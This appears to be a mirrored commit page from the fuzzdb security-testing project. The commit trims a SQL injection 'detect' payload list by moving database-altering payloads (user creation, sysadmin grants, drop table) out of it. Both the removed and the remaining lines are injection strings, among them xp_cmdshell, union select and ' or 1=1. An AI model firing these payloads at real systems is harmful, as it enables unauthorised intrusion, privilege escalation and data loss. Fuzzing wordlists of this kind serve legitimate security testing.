mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-11-10 05:24:12 +00:00
Removed payloads that alter the database
This is the "detect" list, and it has payloads that alter the database. That's not good for a "detect" list - should be in "exploit".
This commit is contained in:
parent
83171d83e8
commit
199993fb41
1 changed files with 3 additions and 8 deletions
|
@ -1,13 +1,8 @@
|
||||||
|
'; --
|
||||||
|
'); --
|
||||||
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
|
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
|
||||||
'create user name identified by 'pass123' --
|
|
||||||
'create user name identified by pass123 temporary tablespace temp default tablespace users;
|
|
||||||
' ; drop table temp --
|
|
||||||
'exec sp_addlogin 'name' , 'password' --
|
|
||||||
' exec sp_addsrvrolemember 'name' , 'sysadmin' --
|
|
||||||
' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
|
|
||||||
' grant connect to name; grant resource to name; --
|
' grant connect to name; grant resource to name; --
|
||||||
' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
|
' or 1=1 --
|
||||||
' or 1=1 --
|
|
||||||
' union (select @@version) --
|
' union (select @@version) --
|
||||||
' union (select NULL, (select @@version)) --
|
' union (select NULL, (select @@version)) --
|
||||||
' union (select NULL, NULL, (select @@version)) --
|
' union (select NULL, NULL, (select @@version)) --
|
||||||
|
|
Loading…
Reference in a new issue